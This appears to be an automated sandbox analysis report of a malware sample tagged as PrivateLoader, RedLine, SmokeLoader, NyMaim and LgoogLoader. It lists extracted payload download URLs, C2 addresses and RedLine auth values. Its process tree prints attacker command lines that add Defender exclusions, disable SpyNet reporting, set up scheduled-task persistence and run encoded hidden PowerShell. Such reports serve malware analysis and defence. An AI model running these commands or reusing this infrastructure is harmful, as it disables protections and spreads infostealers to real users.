lgoogloader | 85b73b7b3c9acc6648beb77ce878ebeea26a2a949bf17c3184f2bd4544d12b45

Analysis

max time kernel
48s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
11-11-2022 00:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Service.exe
Size

4.8MB
MD5

854d5dfe2d5193aa4150765c123df8ad
SHA1

1b21d80c4beb90b03d795cf11145619aeb3a4f37
SHA256

85b73b7b3c9acc6648beb77ce878ebeea26a2a949bf17c3184f2bd4544d12b45
SHA512

48ed604ea966a35cc16631ce5da692bb236badafdb6d3d01ef3a27ab5a9c1ea6a19d6e8209c894ab292614cfbd355c2ca96401fd4dbb9a3abbfd886cddae77cc
SSDEEP

98304:GiIOIQKetb5uDv/tFAOoLKSIc5EP61wNYZiu7JfQmEM9:rIbCEA1EP614g9fQm59

Score

10^/10

lgoogloader nymaim privateloader redline smokeloader persecloud logs backdoor downloader evasion infostealer loader main spyware stealer trojan vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://fluxportugal.pt/js/vendor/config_40.ps1

Extracted

Family

privateloader

208.67.104.60

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

Attributes

payload_url
https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://193.56.146.76/Proxytest.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe
http://luminati-china.xyz/aman/casper2.exe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe
http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp
http://185.215.113.208/ferrari.exe
https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp
https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://mnbuiy.pw/adsli/note8876.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://luminati-china.xyz/aman/casper2.exe
https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe
http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe
https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

Extracted

Family

redline

37.139.128.203:10925

Attributes

auth_value
d37697fc398092da22f2d13a99bd24cb

Extracted

Family

redline

Botnet

PerseCloud Logs

151.80.89.227:45878

Attributes

auth_value
f35e78a6b4be27a5c8621510cdcfa361

Extracted

Family

nymaim

45.139.105.171

85.31.46.167

Signatures

Detects LgoogLoader payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2088-340-0x00000000009E0000-0x00000000009ED000-memory.dmp	family_lgoogloader

Detects Smokeloader packer 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1152-273-0x00000000009A0000-0x00000000009A9000-memory.dmp	family_smokeloader
behavioral2/memory/1080-277-0x0000000000990000-0x0000000000999000-memory.dmp	family_smokeloader

LgoogLoader
A downloader capable of dropping and executing other malware families.
downloader lgoogloader
NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
trojan nymaim
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5684 1396 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5684	1396	rundll32.exe

RedLine payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3288-216-0x0000000000B10000-0x0000000000B38000-memory.dmp	family_redline
C:\Users\Admin\Pictures\Minor Policy\cH7MoNmAKCMUP8e921bJk0C4.exe	family_redline
C:\Users\Admin\Pictures\Minor Policy\cH7MoNmAKCMUP8e921bJk0C4.exe	family_redline
behavioral2/memory/3700-238-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

Service.exeGyGwNjN9BvWWcW_LH7xXK74L.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Service.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	GyGwNjN9BvWWcW_LH7xXK74L.exe

Downloads MZ/PE file

Executes dropped EXE 11 IoCs

Processes:

GyGwNjN9BvWWcW_LH7xXK74L.exeoEUWOJWr7FDyoolxfI_ghnzJ.exe7ZWomrEScjBjZRVE8eYQgR44.exeafnc4GC8US7apLGTru6mFPMK.exesJsYt0xwlbe07pKAfhHf_Bv4.exeRTEazUFMZOgx28yBe5_X0Ltq.exe7IhIrPonzR4AQilW3xYS_bH9.exeBu7VfgdNficwrRrXVT3CSzQL.exeWGrWP2G6bWZ1GzAC4TIwK8pF.exedllGcvQj4waXvaAJ4ZiAWBWk.exe9DjWR1JAfcRjH5p6_q2HzjFM.exe

pid	process
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe
2768	oEUWOJWr7FDyoolxfI_ghnzJ.exe
1152	7ZWomrEScjBjZRVE8eYQgR44.exe
1036	afnc4GC8US7apLGTru6mFPMK.exe
2480	sJsYt0xwlbe07pKAfhHf_Bv4.exe
468	RTEazUFMZOgx28yBe5_X0Ltq.exe
1424	7IhIrPonzR4AQilW3xYS_bH9.exe
3860	Bu7VfgdNficwrRrXVT3CSzQL.exe
1080	WGrWP2G6bWZ1GzAC4TIwK8pF.exe
1328	dllGcvQj4waXvaAJ4ZiAWBWk.exe
3816	9DjWR1JAfcRjH5p6_q2HzjFM.exe

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/5568-409-0x0000000140000000-0x000000014061C000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Service.exeGyGwNjN9BvWWcW_LH7xXK74L.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Service.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Service.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	GyGwNjN9BvWWcW_LH7xXK74L.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	GyGwNjN9BvWWcW_LH7xXK74L.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Service.exeGyGwNjN9BvWWcW_LH7xXK74L.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Service.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	GyGwNjN9BvWWcW_LH7xXK74L.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Service.exeGyGwNjN9BvWWcW_LH7xXK74L.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Service.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	GyGwNjN9BvWWcW_LH7xXK74L.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

9 ipinfo.io
10 ipinfo.io
20 ipinfo.io
21 ipinfo.io

flow	ioc
9	ipinfo.io
10	ipinfo.io
20	ipinfo.io
21	ipinfo.io

Drops file in System32 directory 4 IoCs

Processes:

GyGwNjN9BvWWcW_LH7xXK74L.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	GyGwNjN9BvWWcW_LH7xXK74L.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	GyGwNjN9BvWWcW_LH7xXK74L.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	GyGwNjN9BvWWcW_LH7xXK74L.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	GyGwNjN9BvWWcW_LH7xXK74L.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Service.exeGyGwNjN9BvWWcW_LH7xXK74L.exe

pid process

2412 Service.exe
4276 GyGwNjN9BvWWcW_LH7xXK74L.exe

Drops file in Program Files directory 2 IoCs

Processes:

Service.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Service.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Service.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 20 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3688	1080	WerFault.exe	WGrWP2G6bWZ1GzAC4TIwK8pF.exe
4568	3796	WerFault.exe	GcleanerEU.exe
5200	4412	WerFault.exe	gcleaner.exe
5592	3796	WerFault.exe	GcleanerEU.exe
5744	4412	WerFault.exe	gcleaner.exe
6032	3796	WerFault.exe	GcleanerEU.exe
4492	4412	WerFault.exe	gcleaner.exe
5188	3796	WerFault.exe	GcleanerEU.exe
6052	4412	WerFault.exe	gcleaner.exe
4348	3796	WerFault.exe	GcleanerEU.exe
5980	4412	WerFault.exe	gcleaner.exe
780	5632	WerFault.exe	rundll32.exe
5672	3796	WerFault.exe	GcleanerEU.exe
5260	4412	WerFault.exe	gcleaner.exe
5440	3796	WerFault.exe	GcleanerEU.exe
4152	4412	WerFault.exe	gcleaner.exe
5108	3796	WerFault.exe	GcleanerEU.exe
5628	4412	WerFault.exe	gcleaner.exe
5492	3796	WerFault.exe	GcleanerEU.exe
5392	4412	WerFault.exe	gcleaner.exe

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3016 schtasks.exe
4976 schtasks.exe
332 schtasks.exe
580 schtasks.exe
2352 schtasks.exe
2524 schtasks.exe
2924 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2380 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

5388 tasklist.exe
6080 tasklist.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1968 taskkill.exe
220 taskkill.exe
6016 taskkill.exe
5176 taskkill.exe

pid	process
3016	schtasks.exe
4976	schtasks.exe
332	schtasks.exe
580	schtasks.exe
2352	schtasks.exe
2524	schtasks.exe
2924	schtasks.exe

pid	process
2380	timeout.exe

pid	process
5388	tasklist.exe
6080	tasklist.exe

pid	process
1968	taskkill.exe
220	taskkill.exe
6016	taskkill.exe
5176	taskkill.exe

Modifies registry class 1 IoCs

Processes:

GyGwNjN9BvWWcW_LH7xXK74L.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	GyGwNjN9BvWWcW_LH7xXK74L.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

5612 PING.EXE
2304 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 274 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
5612	PING.EXE
2304	PING.EXE

description	flow	ioc
HTTP User-Agent header	274	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

Service.exeGyGwNjN9BvWWcW_LH7xXK74L.exe

pid	process
2412	Service.exe
2412	Service.exe
2412	Service.exe
2412	Service.exe
2412	Service.exe
2412	Service.exe
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe
4276	GyGwNjN9BvWWcW_LH7xXK74L.exe

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

Service.exeGyGwNjN9BvWWcW_LH7xXK74L.exe

description	pid	process	target process
PID 2412 wrote to memory of 4276	2412	Service.exe	GyGwNjN9BvWWcW_LH7xXK74L.exe
PID 2412 wrote to memory of 4276	2412	Service.exe	GyGwNjN9BvWWcW_LH7xXK74L.exe
PID 2412 wrote to memory of 4276	2412	Service.exe	GyGwNjN9BvWWcW_LH7xXK74L.exe
PID 2412 wrote to memory of 580	2412	Service.exe	schtasks.exe
PID 2412 wrote to memory of 580	2412	Service.exe	schtasks.exe
PID 2412 wrote to memory of 580	2412	Service.exe	schtasks.exe
PID 2412 wrote to memory of 2352	2412	Service.exe	schtasks.exe
PID 2412 wrote to memory of 2352	2412	Service.exe	schtasks.exe
PID 2412 wrote to memory of 2352	2412	Service.exe	schtasks.exe
PID 4276 wrote to memory of 1152	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	7ZWomrEScjBjZRVE8eYQgR44.exe
PID 4276 wrote to memory of 1152	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	7ZWomrEScjBjZRVE8eYQgR44.exe
PID 4276 wrote to memory of 1152	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	7ZWomrEScjBjZRVE8eYQgR44.exe
PID 4276 wrote to memory of 2768	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	oEUWOJWr7FDyoolxfI_ghnzJ.exe
PID 4276 wrote to memory of 2768	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	oEUWOJWr7FDyoolxfI_ghnzJ.exe
PID 4276 wrote to memory of 2768	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	oEUWOJWr7FDyoolxfI_ghnzJ.exe
PID 4276 wrote to memory of 1036	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	afnc4GC8US7apLGTru6mFPMK.exe
PID 4276 wrote to memory of 1036	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	afnc4GC8US7apLGTru6mFPMK.exe
PID 4276 wrote to memory of 2480	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	sJsYt0xwlbe07pKAfhHf_Bv4.exe
PID 4276 wrote to memory of 2480	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	sJsYt0xwlbe07pKAfhHf_Bv4.exe
PID 4276 wrote to memory of 1424	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	7IhIrPonzR4AQilW3xYS_bH9.exe
PID 4276 wrote to memory of 1424	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	7IhIrPonzR4AQilW3xYS_bH9.exe
PID 4276 wrote to memory of 1424	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	7IhIrPonzR4AQilW3xYS_bH9.exe
PID 4276 wrote to memory of 3860	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	Bu7VfgdNficwrRrXVT3CSzQL.exe
PID 4276 wrote to memory of 3860	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	Bu7VfgdNficwrRrXVT3CSzQL.exe
PID 4276 wrote to memory of 3860	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	Bu7VfgdNficwrRrXVT3CSzQL.exe
PID 4276 wrote to memory of 468	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	RTEazUFMZOgx28yBe5_X0Ltq.exe
PID 4276 wrote to memory of 468	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	RTEazUFMZOgx28yBe5_X0Ltq.exe
PID 4276 wrote to memory of 468	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	RTEazUFMZOgx28yBe5_X0Ltq.exe
PID 4276 wrote to memory of 3816	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	9DjWR1JAfcRjH5p6_q2HzjFM.exe
PID 4276 wrote to memory of 3816	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	9DjWR1JAfcRjH5p6_q2HzjFM.exe
PID 4276 wrote to memory of 3816	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	9DjWR1JAfcRjH5p6_q2HzjFM.exe
PID 4276 wrote to memory of 1080	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	WGrWP2G6bWZ1GzAC4TIwK8pF.exe
PID 4276 wrote to memory of 1080	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	WGrWP2G6bWZ1GzAC4TIwK8pF.exe
PID 4276 wrote to memory of 1080	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	WGrWP2G6bWZ1GzAC4TIwK8pF.exe
PID 4276 wrote to memory of 1328	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	dllGcvQj4waXvaAJ4ZiAWBWk.exe
PID 4276 wrote to memory of 1328	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	dllGcvQj4waXvaAJ4ZiAWBWk.exe
PID 4276 wrote to memory of 1328	4276	GyGwNjN9BvWWcW_LH7xXK74L.exe	dllGcvQj4waXvaAJ4ZiAWBWk.exe

C:\Users\Admin\AppData\Local\Temp\Service.exe
"C:\Users\Admin\AppData\Local\Temp\Service.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2412

C:\Users\Admin\Documents\GyGwNjN9BvWWcW_LH7xXK74L.exe
"C:\Users\Admin\Documents\GyGwNjN9BvWWcW_LH7xXK74L.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4276

C:\Users\Admin\Pictures\Minor Policy\sJsYt0xwlbe07pKAfhHf_Bv4.exe
"C:\Users\Admin\Pictures\Minor Policy\sJsYt0xwlbe07pKAfhHf_Bv4.exe"
3⤵
- Executes dropped EXE
PID:2480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1567.tmp.bat""
4⤵
PID:1964

C:\Windows\system32\timeout.exe
timeout 3
5⤵
- Delays execution with timeout.exe
PID:2380

C:\ProgramData\WindowsMail\AVPTQBAEW.exe
"C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
5⤵
PID:3768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
6⤵
PID:2436

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
6⤵
PID:5652

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
7⤵
- Creates scheduled task(s)
PID:332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
PID:4804

C:\Users\Admin\Pictures\Minor Policy\afnc4GC8US7apLGTru6mFPMK.exe
"C:\Users\Admin\Pictures\Minor Policy\afnc4GC8US7apLGTru6mFPMK.exe"
3⤵
- Executes dropped EXE
PID:1036

C:\Users\Admin\Pictures\Minor Policy\oEUWOJWr7FDyoolxfI_ghnzJ.exe
"C:\Users\Admin\Pictures\Minor Policy\oEUWOJWr7FDyoolxfI_ghnzJ.exe" /SP-/VERYSILENT /SUPPRESSMSGBOXES /INSTALLERSHOWNELSEWHERE /pid=747
3⤵
- Executes dropped EXE
PID:2768

C:\Users\Admin\AppData\Local\Temp\is-HV2HA.tmp\oEUWOJWr7FDyoolxfI_ghnzJ.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HV2HA.tmp\oEUWOJWr7FDyoolxfI_ghnzJ.tmp" /SL5="$A0040,11860388,791040,C:\Users\Admin\Pictures\Minor Policy\oEUWOJWr7FDyoolxfI_ghnzJ.exe" /SP-/VERYSILENT /SUPPRESSMSGBOXES /INSTALLERSHOWNELSEWHERE /pid=747
4⤵
PID:3636

C:\Users\Admin\Pictures\Minor Policy\7ZWomrEScjBjZRVE8eYQgR44.exe
"C:\Users\Admin\Pictures\Minor Policy\7ZWomrEScjBjZRVE8eYQgR44.exe"
3⤵
- Executes dropped EXE
PID:1152

C:\Users\Admin\Pictures\Minor Policy\7IhIrPonzR4AQilW3xYS_bH9.exe
"C:\Users\Admin\Pictures\Minor Policy\7IhIrPonzR4AQilW3xYS_bH9.exe"
3⤵
- Executes dropped EXE
PID:1424

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
4⤵
PID:2088

C:\Users\Admin\Pictures\Minor Policy\Bu7VfgdNficwrRrXVT3CSzQL.exe
"C:\Users\Admin\Pictures\Minor Policy\Bu7VfgdNficwrRrXVT3CSzQL.exe"
3⤵
- Executes dropped EXE
PID:3860

C:\Users\Admin\AppData\Local\Temp\7zS54A8.tmp\Install.exe
.\Install.exe
4⤵
PID:4176

C:\Users\Admin\AppData\Local\Temp\7zSCF46.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:3844

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:1340

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:4012

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:3796

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:4368

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:2776

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:3324

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:1832

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:3152

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gvnQjqhMK" /SC once /ST 00:09:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:3016

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gvnQjqhMK"
6⤵
PID:3732

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gvnQjqhMK"
6⤵
PID:4568

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bwTyVIlSpCoBEcNRGc" /SC once /ST 01:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EDdmQQsRZYMnupcka\VHSmdiHZODWiKhD\eSWHRjH.exe\" VP /site_id 525403 /S" /V1 /F
6⤵
- Creates scheduled task(s)
PID:4976

C:\Users\Admin\Pictures\Minor Policy\9DjWR1JAfcRjH5p6_q2HzjFM.exe
"C:\Users\Admin\Pictures\Minor Policy\9DjWR1JAfcRjH5p6_q2HzjFM.exe"
3⤵
- Executes dropped EXE
PID:3816

C:\Users\Admin\AppData\Local\Temp\is-IRAFI.tmp\9DjWR1JAfcRjH5p6_q2HzjFM.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IRAFI.tmp\9DjWR1JAfcRjH5p6_q2HzjFM.tmp" /SL5="$B0046,140559,56832,C:\Users\Admin\Pictures\Minor Policy\9DjWR1JAfcRjH5p6_q2HzjFM.exe"
4⤵
PID:2296

C:\Users\Admin\AppData\Local\Temp\is-8E9DL.tmp\PowerOff.exe
"C:\Users\Admin\AppData\Local\Temp\is-8E9DL.tmp\PowerOff.exe" /S /UID=95
5⤵
PID:2076

C:\Users\Admin\AppData\Local\Temp\65-83463-84d-0f895-99a02265803b9\Herypaevumy.exe
"C:\Users\Admin\AppData\Local\Temp\65-83463-84d-0f895-99a02265803b9\Herypaevumy.exe"
6⤵
PID:5008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
7⤵
PID:4380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
